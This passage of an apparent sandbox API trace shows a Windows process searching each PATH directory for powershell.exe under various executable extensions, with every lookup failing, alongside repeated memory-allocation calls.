dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0091.078] GetFileAttributesExW (in: lpFileName="powershell.exe.msc" (normalized: "c:\\users\\fd1hvy\\desktop\\powershell.exe.msc"), fInfoLevelId=0x0, lpFileInformation=0x110bb93c | out: lpFileInformation=0x110bb93c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0091.078] CreateFileW (lpFileName="powershell.exe.msc" (normalized: "c:\\users\\fd1hvy\\desktop\\powershell.exe.msc"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0091.078] GetEnvironmentVariableW (in: lpName="path", lpBuffer=0x110ce1a0, nSize=0x64 | out: lpBuffer="") returned 0xbc [0091.078] VirtualAlloc (lpAddress=0x110de000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x110de000 [0091.079] GetEnvironmentVariableW (in: lpName="path", lpBuffer=0x110de000, nSize=0xbc | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0091.079] VirtualAlloc (lpAddress=0x110e0000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x110e0000 [0091.079] VirtualAlloc (lpAddress=0x110e2000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x110e2000 [0091.079] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\powershell.exe" (normalized: "c:\\programdata\\oracle\\java\\javapath\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0x110bb93c | out: lpFileInformation=0x110bb93c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0091.083] CreateFileW (lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\powershell.exe" (normalized: "c:\\programdata\\oracle\\java\\javapath\\powershell.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0091.086] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\powershell.exe.com" (normalized: "c:\\programdata\\oracle\\java\\javapath\\powershell.exe.com"), fInfoLevelId=0x0, lpFileInformation=0x110bb93c | out: lpFileInformation=0x110bb93c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0091.089] CreateFileW (lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\powershell.exe.com" (normalized: "c:\\programdata\\oracle\\java\\javapath\\powershell.exe.com"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0091.092] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\powershell.exe.exe" (normalized: "c:\\programdata\\oracle\\java\\javapath\\powershell.exe.exe"), fInfoLevelId=0x0, lpFileInformation=0x110bb93c | out: lpFileInformation=0x110bb93c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0091.095] CreateFileW (lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\powershell.exe.exe" (normalized: "c:\\programdata\\oracle\\java\\javapath\\powershell.exe.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0091.099] VirtualAlloc (lpAddress=0x0, dwSize=0x40000, flAllocationType=0x3000, flProtect=0x4) returned 0x10f90000 [0091.103] VirtualAlloc (lpAddress=0x11100000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x11100000 [0091.103] VirtualAlloc (lpAddress=0x11102000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x11102000 [0091.104] VirtualAlloc (lpAddress=0x11104000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x11104000 [0091.104] VirtualAlloc (lpAddress=0x11106000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x11106000 [0091.104] VirtualAlloc (lpAddress=0x11108000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x11108000 [0091.104] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\powershell.exe.bat" (normalized: "c:\\programdata\\oracle\\java\\javapath\\powershell.exe.bat"), fInfoLevelId=0x0, lpFileInformation=0x110bb93c | out: lpFileInformation=0x110bb93c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0091.107] CreateFileW (lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\powershell.exe.bat" (normalized: "c:\\programdata\\oracle\\java\\javapath\\powershell.exe.bat"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0091.110] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\powershell.exe.cmd" (normalized: "c:\\programdata\\oracle\\java\\javapath\\powershell.exe.cmd"), fInfoLevelId=0x0, lpFileInformation=0x110bb93c | out: lpFileInformation=0x110bb93c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0091.113] CreateFileW (lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\powershell.exe.cmd" (normalized: "c:\\programdata\\oracle\\java\\javapath\\powershell.exe.cmd"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0091.116] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\powershell.exe.vbs" (normalized: "c:\\programdata\\oracle\\java\\javapath\\powershell.exe.vbs"), fInfoLevelId=0x0, lpFileInformation=0x110bb93c | out: lpFileInformation=0x110bb93c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0091.119] CreateFileW (lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\powershell.exe.vbs" (normalized: "c:\\programdata\\oracle\\java\\javapath\\powershell.exe.vbs"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0091.123] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\powershell.exe.vbe" (normalized: "c:\\programdata\\oracle\\java\\javapath\\powershell.exe.vbe"), fInfoLevelId=0x0, lpFileInformation=0x110bb93c | out: lpFileInformation=0x110bb93c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0091.125] CreateFileW (lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\powershell.exe.vbe" (normalized: "c:\\programdata\\oracle\\java\\javapath\\powershell.exe.vbe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0091.129] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\powershell.exe.js" (normalized: "c:\\programdata\\oracle\\java\\javapath\\powershell.exe.js"), fInfoLevelId=0x0, lpFileInformation=0x110bb93c | out: lpFileInformation=0x110bb93c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0091.132] CreateFileW (lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\powershell.exe.js" (normalized: "c:\\programdata\\oracle\\java\\javapath\\powershell.exe.js"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0091.148] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\powershell.exe.jse" (normalized: "c:\\programdata\\oracle\\java\\javapath\\powershell.exe.jse"), fInfoLevelId=0x0, lpFileInformation=0x110bb93c | out: lpFileInformation=0x110bb93c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0091.151] CreateFileW (lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\powershell.exe.jse" (normalized: "c:\\programdata\\oracle\\java\\javapath\\powershell.exe.jse"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0091.154] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\powershell.exe.wsf" (normalized: "c:\\programdata\\oracle\\java\\javapath\\powershell.exe.wsf"), fInfoLevelId=0x0, lpFileInformation=0x110bb93c | out: lpFileInformation=0x110bb93c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0091.157] CreateFileW (lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\powershell.exe.wsf" (normalized: "c:\\programdata\\oracle\\java\\javapath\\powershell.exe.wsf"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0091.160] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\powershell.exe.wsh" (normalized: "c:\\programdata\\oracle\\java\\javapath\\powershell.exe.wsh"), fInfoLevelId=0x0, lpFileInformation=0x110bb93c | out: lpFileInformation=0x110bb93c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0091.163] CreateFileW (lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\powershell.exe.wsh" (normalized: "c:\\programdata\\oracle\\java\\javapath\\powershell.exe.wsh"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0091.166] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\powershell.exe.msc" (normalized: "c:\\programdata\\oracle\\java\\javapath\\powershell.exe.msc"), fInfoLevelId=0x0, lpFileInformation=0x110bb93c | out: lpFileInformation=0x110bb93c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0091.169] CreateFileW (lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\powershell.exe.msc" (normalized: "c:\\programdata\\oracle\\java\\javapath\\powershell.exe.msc"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0091.171] VirtualAlloc (lpAddress=0x1110a000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x1110a000 [0091.173] VirtualAlloc (lpAddress=0x1110c000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x1110c000 [0091.173] VirtualAlloc (lpAddress=0x1110e000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x1110e000 [0091.173] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\powershell.exe" (normalized: "c:\\windows\\system32\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0x110bb93c | out: lpFileInformation=0x110bb93c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0091.173] CreateFileW (lpFileName="C:\\WINDOWS\\system32\\powershell.exe" (normalized: "c:\\windows\\system32\\powershell.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0091.173] VirtualAlloc (lpAddress=0x11110000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x11110000 [0091.174] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\powershell.exe.com" (normalized: "c:\\windows\\system32\\powershell.exe.com"), fInfoLevelId=0x0, lpFileInformation=0x110bb93c | out: lpFileInformation=0x110bb93c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0091.174] CreateFileW (lpFileName="C:\\WINDOWS\\system32\\powershell.exe.com" (normalized: "c:\\windows\\system32\\powershell.exe.com"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0091.174] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\powershell.exe.exe" (normalized: "c:\\windows\\system32\\powershell.exe.exe"), fInfoLevelId=0x0, lpFileInformation=0x110bb93c | out: lpFileInformation=0x110bb93c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0091.174] CreateFileW (lpFileName="C:\\WINDOWS\\system32\\powershell.exe.exe" (normalized: "c:\\windows\\system32\\powershell.exe.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0091.174] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\powershell.exe.bat" (normalized: "c:\\windows\\system32\\powershell.exe.bat"), fInfoLevelId=0x0, lpFileInformation=0x110bb93c | out: lpFileInformation=0x110bb93c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0091.174] CreateFileW (lpFileName="C:\\WINDOWS\\system32\\powershell.exe.bat" (normalized: "c:\\windows\\system32\\powershell.exe.bat"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0091.174] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\powershell.exe.cmd" (normalized: "c:\\windows\\system32\\powershell.exe.cmd"), fInfoLevelId=0x0, lpFileInformation=0x110bb93c | out: lpFileInformation=0x110bb93c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0091.174] CreateFileW (lpFileName="C:\\WINDOWS\\system32\\powershell.exe.cmd" (normalized: "c:\\windows\\system32\\powershell.exe.cmd"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0091.174] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\powershell.exe.vbs" (normalized: "c:\\windows\\system32\\powershell.exe.vbs"), fInfoLevelId=0x0, lpFileInformation=0x110bb93c | out: lpFileInformation=0x110bb93c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0091.174] CreateFileW (lpFileName="C:\\WINDOWS\\system32\\powershell.exe.vbs" (normalized: "c:\\windows\\system32\\powershell.exe.vbs"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0091.175] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\powershell.exe.vbe" (normalized: "c:\\windows\\system32\\powershell.exe.vbe"), fInfoLevelId=0x0, lpFileInformation=0x110bb93c | out: lpFileInformation=0x110bb93c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0091.175] CreateFileW (lpFileName="C:\\WINDOWS\\system32\\powershell.exe.vbe" (normalized: "c:\\windows\\system32\\powershell.exe.vbe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0091.175] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\powershell.exe.js" (normalized: "c:\\windows\\system32\\powershell.exe.js"), fInfoLevelId=0x0, lpFileInformation=0x110bb93c | out: lpFileInformation=0x110bb93c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0091.175] CreateFileW (lpFileName="C:\\WINDOWS\\system32\\powershell.exe.js" (normalized: "c:\\windows\\system32\\powershell.exe.js"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0091.175] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\powershell.exe.jse" (normalized: "c:\\windows\\system32\\powershell.exe.jse"), fInfoLevelId=0x0, lpFileInformation=0x110bb93c | out: lpFileInformation=0x110bb93c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0091.175] CreateFileW (lpFileName="C:\\WINDOWS\\system32\\powershell.exe.jse" (normalized: "c:\\windows\\system32\\powershell.exe.jse"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0091.175] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\powershell.exe.wsf" (normalized: "c:\\windows\\system32\\powershell.exe.wsf"), fInfoLevelId=0x0, lpFileInformation=0x110bb93c | out: lpFileInformation=0x110bb93c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0091.175] CreateFileW (lpFileName="C:\\WINDOWS\\system32\\powershell.exe.wsf" (normalized: "c:\\windows\\system32\\powershell.exe.wsf"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0091.175] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\powershell.exe.wsh" (normalized: "c:\\windows\\system32\\powershell.exe.wsh"), fInfoLevelId=0x0, lpFileInformation=0x110bb93c | out: lpFileInformation=0x110bb93c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0091.175] CreateFileW (lpFileName="C:\\WINDOWS\\system32\\powershell.exe.wsh" (normalized: "c:\\windows\\system32\\powershell.exe.wsh"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0091.175] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\powershell.exe.msc" (normalized: "c:\\windows\\system32\\powershell.exe.msc"), fInfoLevelId=0x0, lpFileInformation=0x110bb93c | out: lpFileInformation=0x110bb93c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0091.175] CreateFileW (lpFileName="C:\\WINDOWS\\system32\\powershell.exe.msc" (normalized: "c:\\windows\\system32\\powershell.exe.msc"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0091.176] VirtualAlloc (lpAddress=0x11112000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x11112000 [0091.176] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\powershell.exe" (normalized: "c:\\windows\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0x110bb93c | out: lpFileInformation=0x110bb93c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0091.176] CreateFileW (lpFileName="C:\\WINDOWS\\powershell.exe" (normalized: "c:\\windows\\powershell.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0091.176] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\powershell.exe.com" (normalized: "c:\\windows\\powershell.exe.com"), fInfoLevelId=0x0, lpFileInformation=0x110bb93c | out: lpFileInformation=0x110bb93c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0091.176] CreateFileW (lpFileName="C:\\WINDOWS\\powershell.exe.com" (normalized: "c:\\windows\\powershell.exe.com"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0091.176] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\powershell.exe.exe" (normalized: "c:\\windows\\powershell.exe.exe"), fInfoLevelId=0x0, lpFileInformation=0x110bb93c | out: lpFileInformation=0x110bb93c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0091.176] CreateFileW (lpFileName="C:\\WINDOWS\\powershell.exe.exe" (normalized: "c:\\windows\\powershell.exe.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) 